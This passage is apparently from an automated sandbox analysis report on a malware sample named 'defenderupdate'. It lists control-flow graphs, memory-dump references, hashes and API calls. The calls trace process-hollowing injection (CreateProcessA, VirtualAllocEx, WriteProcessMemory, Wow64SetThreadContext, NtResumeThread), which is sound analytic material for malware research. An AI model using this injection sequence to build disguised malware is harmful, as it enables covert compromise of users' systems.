52704->52705 52764 6b7d800 52705->52764 52768 6b7d808 52705->52768 52706 6b74e7c 52710 6b74eaa 52709->52710 52772 6b7d180 52710->52772 52776 6b7d188 52710->52776 52711 6b747cc 52715 6b7565d 52714->52715 52780 6b7c8e0 52715->52780 52784 6b7c8e8 52715->52784 52716 6b747cc 52720 6b7484d 52719->52720 52722 6b7c8e0 Wow64SetThreadContext 52720->52722 52723 6b7c8e8 Wow64SetThreadContext 52720->52723 52721 6b747cc 52722->52721 52723->52721 52725 6b748ac 52724->52725 52727 6b7d800 NtResumeThread 52725->52727 52728 6b7d808 NtResumeThread 52725->52728 52726 6b74e7c 52727->52726 52728->52726 52730 6b74d80 52729->52730 52732 6b7d180 WriteProcessMemory 52730->52732 52733 6b7d188 WriteProcessMemory 52730->52733 52731 6b74df1 52731->52676 52732->52731 52733->52731 52735 6b74950 52734->52735 52737 6b7d180 WriteProcessMemory 52735->52737 52738 6b7d188 WriteProcessMemory 52735->52738 52736 6b749f4 52736->52676 52737->52736 52738->52736 52740 6b748ee 52739->52740 52741 6b747cc 52740->52741 52788 6b7cee1 52740->52788 52792 6b7cee8 52740->52792 52745 6b74fcf 52744->52745 52747 6b7cee1 VirtualAllocEx 52745->52747 52748 6b7cee8 VirtualAllocEx 52745->52748 52746 6b747cc 52747->52746 52748->52746 52750 6b7576d 52749->52750 52796 6b75f61 52750->52796 52801 6b75f70 52750->52801 52751 6b75785 52756 6b74930 52754->52756 52755 6b747cc 52756->52755 52757 6b7cee1 VirtualAllocEx 52756->52757 52758 6b7cee8 VirtualAllocEx 52756->52758 52757->52755 52758->52755 52760 6b74f04 52759->52760 52761 6b747cc 52759->52761 52760->52761 52762 6b7d180 WriteProcessMemory 52760->52762 52763 6b7d188 WriteProcessMemory 52760->52763 52762->52761 52763->52761 52765 6b7d808 NtResumeThread 52764->52765 52767 6b7d885 52765->52767 52767->52706 52769 6b7d850 NtResumeThread 52768->52769 52771 6b7d885 52769->52771 52771->52706 52773 6b7d188 WriteProcessMemory 52772->52773 52775 6b7d227 52773->52775 52775->52711 52777 6b7d1d0 WriteProcessMemory 52776->52777 52779 6b7d227 52777->52779 52779->52711 52781 6b7c8e8 Wow64SetThreadContext 52780->52781 52783 6b7c975 52781->52783 52783->52716 52785 6b7c92d Wow64SetThreadContext 52784->52785 52787 6b7c975 52785->52787 52787->52716 52789 6b7cf28 VirtualAllocEx 52788->52789 52791 6b7cf65 52789->52791 52791->52741 52793 6b7cf28 VirtualAllocEx 52792->52793 52795 6b7cf65 52793->52795 52795->52741 52797 6b75f87 52796->52797 52798 6b75fa9 52797->52798 52806 6b760cc 52797->52806 52811 6b76050 52797->52811 52798->52751 52802 6b75f87 52801->52802 52803 6b75fa9 52802->52803 52804 6b76050 2 API calls 52802->52804 52805 6b760cc 2 API calls 52802->52805 52803->52751 52804->52803 52805->52803 52807 6b760f4 52806->52807 52816 6b7c10c 52807->52816 52820 6b7c118 52807->52820 52812 6b7605f 52811->52812 52814 6b7c10c CreateProcessA 52812->52814 52815 6b7c118 CreateProcessA 52812->52815 52813 6b764dd 52814->52813 52815->52813 52817 6b7c118 52816->52817 52817->52817 52818 6b7c2bc CreateProcessA 52817->52818 52819 6b7c304 52818->52819 52821 6b7c17c CreateProcessA 52820->52821 52823 6b7c304 52821->52823
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-312445597
                                                                                                • Opcode ID: 84b20c765be5a2334c676ad5240014f76c4605ccd2b891f27f2057dfab93df2a
                                                                                                • Instruction ID: 9878b80e7b3629da055cc612b068ce386822911d3d9db604c5d7ba973c775980
                                                                                                • Opcode Fuzzy Hash: 84b20c765be5a2334c676ad5240014f76c4605ccd2b891f27f2057dfab93df2a
                                                                                                • Instruction Fuzzy Hash: CAB21770A002198FDB54EFA8C894BADB7B6FF48700F148599E505AB3A5DB70ED86CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2546334966
                                                                                                • Opcode ID: 691c64ee401a955cae576c6b319ea8b67fc247f5c69b54157b84c253b0baf983
                                                                                                • Instruction ID: b369f03848fbd04b697347d2f6704840d0287ed2ba24288274f19a328a8ee74a
                                                                                                • Opcode Fuzzy Hash: 691c64ee401a955cae576c6b319ea8b67fc247f5c69b54157b84c253b0baf983
                                                                                                • Instruction Fuzzy Hash: A9220D74A00219CFEB64EF64C994BADB7B2FF48304F148199D509AB3A5DB31AD86CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 2ba152bfaaf8b1bb72dd4e85ee910c048b2d8ee1dc57f712af032fc1e25dd0b7
                                                                                                • Instruction ID: 14e0aede3172c50c172f410ada96a8e1e3d292cb82b14ac39e1bd98fc287e2a1
                                                                                                • Opcode Fuzzy Hash: 2ba152bfaaf8b1bb72dd4e85ee910c048b2d8ee1dc57f712af032fc1e25dd0b7
                                                                                                • Instruction Fuzzy Hash: 5212D474E05218CFEB64DF69D984BAAB7F2FB89300F2081AAD509E7254DB345D81CF61
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06B7B741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: e36a79139f217a80a8476e410d691f30ba03a4d8b13603dcccf03827a3b539d2
                                                                                                • Instruction ID: d585b714a3b39393c6522232e9e71f7d70632e015f823f30a5f44ede0f64d016
                                                                                                • Opcode Fuzzy Hash: e36a79139f217a80a8476e410d691f30ba03a4d8b13603dcccf03827a3b539d2
                                                                                                • Instruction Fuzzy Hash: 4821F3B1D012499FCB10DFAAD984ADEFBF5FB48310F20842AE559A7250C775AA40CFA5
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06B7B741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: 8a8b6ea1e8ba65f9bc0f92eb0be8416b2590d580ab7527f44afe208670e9d388
                                                                                                • Instruction ID: 8d50c1b94e1c179ec9f640f1cb27ec8fcf74e50559f7bcd961f61666880ad8ee
                                                                                                • Opcode Fuzzy Hash: 8a8b6ea1e8ba65f9bc0f92eb0be8416b2590d580ab7527f44afe208670e9d388
                                                                                                • Instruction Fuzzy Hash: ED21FFB1D002499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7210C775A940CBA4
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 06B7D876
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 44051c8731fd34eb4dad9df6e4d691734cf39ae4cb24b93e34f9e3cc3943e4a3
                                                                                                • Instruction ID: e7ede650bef880222e1732454e0cc5c0a9fb45427c18b2a0aad354c855aa23b9
                                                                                                • Opcode Fuzzy Hash: 44051c8731fd34eb4dad9df6e4d691734cf39ae4cb24b93e34f9e3cc3943e4a3
                                                                                                • Instruction Fuzzy Hash: 071106B1D002089BDB20DFAAC845BDFFBF8EF48364F10842AD459A7250CB74A945CFA5
                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(?,?), ref: 06B7D876
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: f99161bed50a5bb394cd4c3682a667fc8180bf5307668d82e62726807e899da2
                                                                                                • Instruction ID: 11b982be54f3c7d4f5e3912d71d7252b9a429afdfab39229d4eba55764af0706
                                                                                                • Opcode Fuzzy Hash: f99161bed50a5bb394cd4c3682a667fc8180bf5307668d82e62726807e899da2
                                                                                                • Instruction Fuzzy Hash: 3B11E4B1D002498FDB10DFAAC484B9EFBF4EF88364F50842AD459A7250CB79A945CFA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: bb2d6d2e0e132fea41d22d433e26644be796b8a1d2ff67ba64a13aef4cb945fd
                                                                                                • Instruction ID: 378f9047bf3b8bb0a74180b00cdf9c5bdc9444eb49ccf490d4cb73d4cf495271
                                                                                                • Opcode Fuzzy Hash: bb2d6d2e0e132fea41d22d433e26644be796b8a1d2ff67ba64a13aef4cb945fd
                                                                                                • Instruction Fuzzy Hash: 5FC10774E15218CFDB94DFA9D984B9EBBF2FF89300F2080A9D409AB255DB349945CF60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 03d7781fb937ae45fa629238ab2ca8b99e0c693d2bdb52dd8b4e3aa502d3d75a
                                                                                                • Instruction ID: cd16296a46b290179cfe850d2e6a322cb305c41b1ff7e275198d7130a4a82502
                                                                                                • Opcode Fuzzy Hash: 03d7781fb937ae45fa629238ab2ca8b99e0c693d2bdb52dd8b4e3aa502d3d75a
                                                                                                • Instruction Fuzzy Hash: 4AB1C574E15218CFEB94DFA9D984B9DBBF2FF89300F2080A9D409AB255DB349945CF60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 206049061d62882378ee4b249dc51975e3b408cdbbcb8e3c347fc18aa22bb8ab
                                                                                                • Instruction ID: 28cdd60a7740b987962f8cb501cf8b4a10ec685c64289010b1310f1b37589b71
                                                                                                • Opcode Fuzzy Hash: 206049061d62882378ee4b249dc51975e3b408cdbbcb8e3c347fc18aa22bb8ab
                                                                                                • Instruction Fuzzy Hash: CAB1F674E15218CFEB94DFA9D984B9DBBF2FF89300F2080A9D409AB255DB349945CF60

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1164 18acb08-18acb16 1165 18acb18-18acb1c 1164->1165 1166 18acb1d-18acba7 GetCurrentProcess 1164->1166 1165->1166 1170 18acba9-18acbaf 1166->1170 1171 18acbb0-18acbe4 GetCurrentThread 1166->1171 1170->1171 1172 18acbed-18acc21 GetCurrentProcess 1171->1172 1173 18acbe6-18acbec 1171->1173 1175 18acc2a-18acc45 call 18acce7 1172->1175 1176 18acc23-18acc29 1172->1176 1173->1172 1179 18acc4b-18acc7a GetCurrentThreadId 1175->1179 1176->1175 1180 18acc7c-18acc82 1179->1180 1181 18acc83-18acce5 1179->1181 1180->1181
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 018ACB96
                                                                                                • GetCurrentThread.KERNEL32 ref: 018ACBD3
                                                                                                • GetCurrentProcess.KERNEL32 ref: 018ACC10
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 018ACC69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 335c9fa44c7c13087ca14a3d62223238bb4907930100502d4fbbf1f214cff71e
                                                                                                • Instruction ID: 77da530c6cd57a8679f5b6c35d11e00a55f891d8be82353ae06c0e7e4a7f32f2
                                                                                                • Opcode Fuzzy Hash: 335c9fa44c7c13087ca14a3d62223238bb4907930100502d4fbbf1f214cff71e
                                                                                                • Instruction Fuzzy Hash: 835144B0A003498FDB14DFAAD548BDEBFF1EF48304F208469E409AB260D7749A84CF65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1188 18acb18-18acba7 GetCurrentProcess 1193 18acba9-18acbaf 1188->1193 1194 18acbb0-18acbe4 GetCurrentThread 1188->1194 1193->1194 1195 18acbed-18acc21 GetCurrentProcess 1194->1195 1196 18acbe6-18acbec 1194->1196 1198 18acc2a-18acc45 call 18acce7 1195->1198 1199 18acc23-18acc29 1195->1199 1196->1195 1202 18acc4b-18acc7a GetCurrentThreadId 1198->1202 1199->1198 1203 18acc7c-18acc82 1202->1203 1204 18acc83-18acce5 1202->1204 1203->1204
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 018ACB96
                                                                                                • GetCurrentThread.KERNEL32 ref: 018ACBD3
                                                                                                • GetCurrentProcess.KERNEL32 ref: 018ACC10
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 018ACC69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 8431d01e973dcbe2b160ac0755966b5b7a4e96fd80518bf450e4969a709ab194
                                                                                                • Instruction ID: af745c4ebd80168df61c7c79633f797881296c11fc41d147fedbfdfdc742ec17
                                                                                                • Opcode Fuzzy Hash: 8431d01e973dcbe2b160ac0755966b5b7a4e96fd80518bf450e4969a709ab194
                                                                                                • Instruction Fuzzy Hash: 825135B09007098FDB14DFAAD548B9EBBF1EF48304F20C459E419A7360D775AA84CF65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1211 6a873e0-6a87408 1213 6a8740a-6a87451 1211->1213 1214 6a87456-6a87464 1211->1214 1264 6a878ad-6a878b4 1213->1264 1215 6a87473 1214->1215 1216 6a87466-6a87471 call 6a84b08 1214->1216 1218 6a87475-6a8747c 1215->1218 1216->1218 1221 6a87482-6a87486 1218->1221 1222 6a87565-6a87569 1218->1222 1223 6a8748c-6a87490 1221->1223 1224 6a878b5-6a878dd 1221->1224 1226 6a8756b-6a8757a call 6a82d10 1222->1226 1227 6a875bf-6a875c9 1222->1227 1228 6a874a2-6a87500 call 6a84848 call 6a852b0 1223->1228 1229 6a87492-6a8749c 1223->1229 1234 6a878e4-6a8790e 1224->1234 1242 6a8757e-6a87583 1226->1242 1230 6a875cb-6a875da call 6a824c8 1227->1230 1231 6a87602-6a87628 1227->1231 1271 6a87973-6a87988 1228->1271 1272 6a87506-6a87560 1228->1272 1229->1228 1229->1234 1248 6a875e0-6a875fd 1230->1248 1249 6a87916 1230->1249 1254 6a8762a-6a87633 1231->1254 1255 6a87635 1231->1255 1234->1249 1243 6a8757c 1242->1243 1244 6a87585-6a875ba call 6a872b0 1242->1244 1243->1242 1244->1264 1248->1264 1253 6a8791e-6a8792c 1249->1253 1274 6a87934-6a8796c 1253->1274 1262 6a87637-6a8765f 1254->1262 1255->1262 1279 6a87730-6a87734 1262->1279 1280 6a87665-6a8767e 1262->1280 1271->1253 1281 6a8798a-6a8799d 1271->1281 1272->1264 1274->1271 1282 6a877ae-6a877b8 1279->1282 1283 6a87736-6a8774f 1279->1283 1280->1279 1302 6a87684-6a87693 call 6a822f0 1280->1302 1285 6a8799f-6a879a5 1281->1285 1286 6a879a7-6a879ad 1281->1286 1288 6a877ba-6a877c4 1282->1288 1289 6a87815-6a8781e 1282->1289 1283->1282 1311 6a87751-6a87760 call 6a822f0 1283->1311 1285->1286 1293 6a879ae-6a879eb 1285->1293 1300 6a877ca-6a877dc 1288->1300 1301 6a877c6-6a877c8 1288->1301 1291 6a87820-6a8784e call 6a84040 call 6a84060 1289->1291 1292 6a87856-6a878a5 call 6a87c21 1289->1292 1291->1292 1319 6a878ab 1292->1319 1307 6a877de-6a877e0 1300->1307 1301->1307 1321 6a876ab-6a876c0 1302->1321 1322 6a87695-6a8769b 1302->1322 1316 6a8780e-6a87813 1307->1316 1317 6a877e2-6a877e6 1307->1317 1328 6a87778-6a87783 1311->1328 1329 6a87762-6a87768 1311->1329 1316->1288 1316->1289 1324 6a877e8-6a87801 1317->1324 1325 6a87804-6a87809 call 6a810f0 1317->1325 1319->1264 1334 6a876c2-6a876ee call 6a83190 1321->1334 1335 6a876f4-6a876fd 1321->1335 1330 6a8769d 1322->1330 1331 6a8769f-6a876a1 1322->1331 1324->1325 1325->1316 1328->1271 1340 6a87789-6a877ac 1328->1340 1338 6a8776a 1329->1338 1339 6a8776c-6a8776e 1329->1339 1330->1321 1331->1321 1334->1274 1334->1335 1335->1271 1337 6a87703-6a8772a 1335->1337 1337->1279 1337->1302 1338->1328 1339->1328 1340->1282 1340->1311
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Hbq$Hbq$Hbq
                                                                                                • API String ID: 0-2297679979
                                                                                                • Opcode ID: 2a42e3cdc306d415a445c12d1d25bb29f19aec987d44f0da8dc58614bbe0d449
                                                                                                • Instruction ID: 0bf5eaa655beee08708731a9d412cfb6564a5b35f79eec873b9ec982887d4170
                                                                                                • Opcode Fuzzy Hash: 2a42e3cdc306d415a445c12d1d25bb29f19aec987d44f0da8dc58614bbe0d449
                                                                                                • Instruction Fuzzy Hash: 85126E70A002058FDB65FFA9D494A6EBBF2FF88300B24852DD5469B3A4DB35EC46CB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1355 6a89218-6a89255 1357 6a89277-6a8928d call 6a89020 1355->1357 1358 6a89257-6a8925a 1355->1358 1364 6a89603-6a89617 1357->1364 1365 6a89293-6a8929f 1357->1365 1471 6a8925c call 6a89b88 1358->1471 1472 6a8925c call 6a89b20 1358->1472 1473 6a8925c call 6a89b30 1358->1473 1360 6a89262-6a89264 1360->1357 1362 6a89266-6a8926e 1360->1362 1362->1357 1376 6a89657-6a89660 1364->1376 1366 6a893d0-6a893d7 1365->1366 1367 6a892a5-6a892a8 1365->1367 1369 6a893dd-6a893e6 1366->1369 1370 6a89506-6a89540 call 6a88a28 1366->1370 1368 6a892ab-6a892b4 1367->1368 1372 6a896f8 1368->1372 1373 6a892ba-6a892ce 1368->1373 1369->1370 1375 6a893ec-6a894f8 call 6a88a28 call 6a88fb8 call 6a88a28 1369->1375 1474 6a89543 call 6a8b9d0 1370->1474 1475 6a89543 call 6a8b9c1 1370->1475 1377 6a896fd-6a89701 1372->1377 1388 6a893c0-6a893ca 1373->1388 1389 6a892d4-6a89369 call 6a89020 * 2 call 6a88a28 call 6a88fb8 call 6a89060 call 6a89108 call 6a89170 1373->1389 1466 6a894fa 1375->1466 1467 6a89503-6a89504 1375->1467 1379 6a89662-6a89669 1376->1379 1380 6a89625-6a8962e 1376->1380 1381 6a8970c 1377->1381 1382 6a89703 1377->1382 1386 6a8966b-6a896ae call 6a88a28 1379->1386 1387 6a896b7-6a896be 1379->1387 1380->1372 1384 6a89634-6a89646 1380->1384 1395 6a8970d 1381->1395 1382->1381 1401 6a89648-6a8964d 1384->1401 1402 6a89656 1384->1402 1386->1387 1391 6a896c0-6a896d0 1387->1391 1392 6a896e3-6a896f6 1387->1392 1388->1366 1388->1368 1447 6a89388-6a893bb call 6a89170 1389->1447 1448 6a8936b-6a89383 call 6a89108 call 6a88a28 call 6a88cd8 1389->1448 1391->1392 1406 6a896d2-6a896da 1391->1406 1392->1377 1395->1395 1469 6a89650 call 6a8c16b 1401->1469 1470 6a89650 call 6a8c170 1401->1470 1402->1376 1406->1392 1415 6a89549-6a895fa call 6a88a28 1415->1364 1447->1388 1448->1447 1466->1467 1467->1370 1469->1402 1470->1402 1471->1360 1472->1360 1473->1360 1474->1415 1475->1415
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q
                                                                                                • API String ID: 0-1196845430
                                                                                                • Opcode ID: 339cf4bc15776ef68bf985c316aead4ab87f13658f6c6b893e798148b2df4fc4
                                                                                                • Instruction ID: 78369b92cdec408866a43b9a228f3f5a58e34ac1f905d804da2351c076955e1c
                                                                                                • Opcode Fuzzy Hash: 339cf4bc15776ef68bf985c316aead4ab87f13658f6c6b893e798148b2df4fc4
                                                                                                • Instruction Fuzzy Hash: 4AF1F134B10218DFDB54EFA4D998AAEB7B2FF88301F118154E506AB3A5DB75EC46CB40

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1476 6a8d7fb-6a8d810 1477 6a8d929-6a8d94e 1476->1477 1478 6a8d816-6a8d81a 1476->1478 1480 6a8d955 1477->1480 1479 6a8d820-6a8d829 1478->1479 1478->1480 1481 6a8d82f-6a8d856 1479->1481 1482 6a8d981-6a8d9b7 1479->1482 1484 6a8d95e-6a8d97a 1480->1484 1493 6a8d85c-6a8d85e 1481->1493 1494 6a8d91e-6a8d928 1481->1494 1499 6a8d9be-6a8d9d4 1482->1499 1484->1482 1495 6a8d87f-6a8d881 1493->1495 1496 6a8d860-6a8d863 1493->1496 1500 6a8d884-6a8d888 1495->1500 1498 6a8d869-6a8d873 1496->1498 1496->1499 1498->1499 1503 6a8d879-6a8d87d 1498->1503 1499->1484 1508 6a8d9d6-6a8da14 1499->1508 1501 6a8d8e9-6a8d8f5 1500->1501 1502 6a8d88a-6a8d899 1500->1502 1501->1499 1506 6a8d8fb-6a8d918 call 6a81120 1501->1506 1502->1499 1511 6a8d89f-6a8d8e6 call 6a81120 1502->1511 1503->1495 1503->1500 1506->1493 1506->1494 1516 6a8da38-6a8da4f 1508->1516 1517 6a8da16-6a8da2a call 6a8dcd0 1508->1517 1511->1501 1526 6a8db40-6a8db50 1516->1526 1527 6a8da55-6a8db3b call 6a89020 call 6a88a28 * 2 call 6a89060 call 6a8c838 call 6a88a28 call 6a8b9d0 call 6a898c8 1516->1527 1594 6a8da2d call 6a8df18 1517->1594 1595 6a8da2d call 6a8e078 1517->1595 1596 6a8da2d call 6a8e0a0 1517->1596 1524 6a8da33 1528 6a8dc63-6a8dc6e 1524->1528 1535 6a8dc3e-6a8dc5a call 6a88a28 1526->1535 1536 6a8db56-6a8dc30 call 6a89020 * 2 call 6a897d8 call 6a88a28 * 2 call 6a88cd8 call 6a89170 call 6a88a28 1526->1536 1527->1526 1537 6a8dc9d-6a8dcbe call 6a89170 1528->1537 1538 6a8dc70-6a8dc80 1528->1538 1535->1528 1590 6a8dc3b 1536->1590 1591 6a8dc32 1536->1591 1547 6a8dc90-6a8dc98 call 6a898c8 1538->1547 1548 6a8dc82-6a8dc88 1538->1548 1547->1537 1548->1547 1590->1535 1591->1590 1594->1524 1595->1524 1596->1524
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$(bq$Hbq
                                                                                                • API String ID: 0-2835675688
                                                                                                • Opcode ID: edc552319711ec67a817e73c049502174b907b86261cbb530a31eefd86a8e1f0
                                                                                                • Instruction ID: b87cc76acceb11ac137905a0183217c589a16f8d4e0c7157c1dde3513703bf35
                                                                                                • Opcode Fuzzy Hash: edc552319711ec67a817e73c049502174b907b86261cbb530a31eefd86a8e1f0
                                                                                                • Instruction Fuzzy Hash: FDE15034A00209DFCB55FF64D5949AEBBB2FF89300F118569E416AB3A5DB30EC46CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1694 6a83539-6a83574 1696 6a8357d-6a83590 call 6a831c8 1694->1696 1697 6a83576 1694->1697 1700 6a836d4-6a836db 1696->1700 1701 6a83596-6a835a9 1696->1701 1697->1696 1702 6a836e1-6a836f6 1700->1702 1703 6a83975-6a8397c 1700->1703 1709 6a835ab-6a835b2 1701->1709 1710 6a835b7-6a835d1 1701->1710 1715 6a836f8-6a836fa 1702->1715 1716 6a83716-6a8371c 1702->1716 1704 6a839eb-6a839f2 1703->1704 1705 6a8397e-6a83987 1703->1705 1711 6a839f8-6a83a01 1704->1711 1712 6a83a8e-6a83a95 1704->1712 1705->1704 1708 6a83989-6a8399c 1705->1708 1708->1704 1728 6a8399e-6a839e3 call 6a80b20 1708->1728 1717 6a836cd 1709->1717 1732 6a835d8-6a835e5 1710->1732 1733 6a835d3-6a835d6 1710->1733 1711->1712 1718 6a83a07-6a83a1a 1711->1718 1713 6a83ab1-6a83ab7 1712->1713 1714 6a83a97-6a83aa8 1712->1714 1721 6a83ac9-6a83ad2 1713->1721 1722 6a83ab9-6a83abf 1713->1722 1714->1713 1738 6a83aaa 1714->1738 1715->1716 1719 6a836fc-6a83713 1715->1719 1723 6a83722-6a83724 1716->1723 1724 6a837e4-6a837e8 1716->1724 1717->1700 1736 6a83a1c-6a83a2b 1718->1736 1737 6a83a2d-6a83a31 1718->1737 1719->1716 1729 6a83ac1-6a83ac7 1722->1729 1730 6a83ad5-6a83b31 1722->1730 1723->1724 1731 6a8372a-6a837ab call 6a80b20 * 4 1723->1731 1724->1703 1734 6a837ee-6a837f0 1724->1734 1728->1704 1772 6a839e5-6a839e8 1728->1772 1729->1721 1729->1730 1797 6a83b39-6a83b4a 1730->1797 1801 6a837ad-6a837bf call 6a80b20 1731->1801 1802 6a837c2-6a837cf call 6a80b20 1731->1802 1740 6a835e7-6a835fb 1732->1740 1733->1740 1734->1703 1735 6a837f6-6a837ff 1734->1735 1741 6a83952-6a83958 1735->1741 1736->1737 1742 6a83a51-6a83a53 1737->1742 1743 6a83a33-6a83a35 1737->1743 1738->1713 1740->1717 1766 6a83601-6a83655 1740->1766 1752 6a8395a-6a83969 1741->1752 1753 6a8396b 1741->1753 